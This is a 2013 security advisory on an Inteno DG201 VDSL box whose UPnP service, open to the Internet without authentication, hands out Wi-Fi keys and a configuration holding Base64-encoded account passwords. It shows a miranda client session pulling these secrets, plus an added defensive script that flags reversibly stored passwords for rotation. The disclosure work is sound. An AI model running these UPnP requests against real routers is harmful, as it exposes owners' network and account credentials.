Intro
This vulnerability was reported on 2013-11-22 and was fixed a couple of months after that.
The DG201 VDSL box has a UPnP service open to the Internet by default. Even if the box is set to bridge mode, it still takes its own public IP address from the Internet.
From the UPnP service you can, for example, download the device configuration, which includes the passwords for Wi-Fi and for the accounts on the box. It is also possible to change the configuration of the device. All of this can be done without any authentication.
- Software version: DG201A-W2U4U_4.06DNT0934.2
Details
The UPnP service listens on TCP port 49431.
Get a UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/
Example
I have manually added my public IP to the configuration, which is basically a list of hosts in a Python pickle.
$ python miranda.py -s upnp-inteno.mir
Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com
Host data restored:
[0] 10.0.2.187:8888
[1] 192.168.1.1:49431
[2] 192.168.1.1:49431
[3] 213.216.x.x:49431
[4] 85.131.x.x:49431
upnp> host get 3
Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...
Host data enumeration complete!
upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys
NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase :
NewPreSharedKey : 12345678
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration
NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
<InternetGatewayDevice>
<LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
<WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
<DeviceInfo>
<ProvisioningCode>12345</ProvisioningCode>
<FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
<VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
</DeviceInfo>
<X_BROADCOM_COM_SyslogCfg>
<Status>Enabled</Status>
<Option>local buffer and remote</Option>
<LocalDisplayLevel>Debug</LocalDisplayLevel>
<ServerIPAddress>10.0.0.1</ServerIPAddress>
</X_BROADCOM_COM_SyslogCfg>
<X_BROADCOM_COM_LoginCfg>
<SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
<UserPassword>dXNlcgo=</UserPassword>
</X_BROADCOM_COM_LoginCfg>
...
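Added example (not part of the original advisory and not code from miranda or the vendor): the SupportPassword and UserPassword values in the configuration above are Base64 text, an encoding rather than a hash, so anyone who could fetch the configuration holds the account passwords themselves. The Python check below is for a device owner to run over a saved configuration export to list which password elements are stored that way and need rotating; the sample configuration and its password values are constructed, and `reversible_secrets` is a hypothetical helper name.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the GetConfiguration output above.
# The password values are made up for this example.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<DslCpeConfig version="3.0">
<InternetGatewayDevice>
<X_BROADCOM_COM_LoginCfg>
<SupportPassword>ZXhhbXBsZS1zdXBwb3J0AA==</SupportPassword>
<UserPassword>ZXhhbXBsZS11c2VyAA==</UserPassword>
</X_BROADCOM_COM_LoginCfg>
<X_BROADCOM_COM_SyslogCfg>
<Status>Enabled</Status>
</X_BROADCOM_COM_SyslogCfg>
</InternetGatewayDevice>
</DslCpeConfig>"""


def reversible_secrets(config_xml):
    """Return {element name: recovered text} for every *Password element
    whose value is Base64-encoded printable text instead of a hash."""
    findings = {}
    for elem in ET.fromstring(config_xml).iter():
        if not elem.tag.lower().endswith("password") or not elem.text:
            continue
        try:
            # validate=True rejects anything outside the Base64 alphabet,
            # so crypt-style hashes such as "$6$..." are skipped.
            raw = base64.b64decode(elem.text.strip(), validate=True)
            text = raw.rstrip(b"\x00\n").decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text and text.isprintable():
            findings[elem.tag] = text
    return findings


if __name__ == "__main__":
    for name, value in reversible_secrets(SAMPLE_CONFIG).items():
        # Report only the length so the audit output does not leak the secret.
        print(f"{name}: stored as reversible Base64 ({len(value)} chars), rotate it")
```

Any element this reports should be treated as disclosed on a device whose UPnP service was reachable from the Internet, and changed after the firmware update is installed.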
Update available
Contacts
- Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi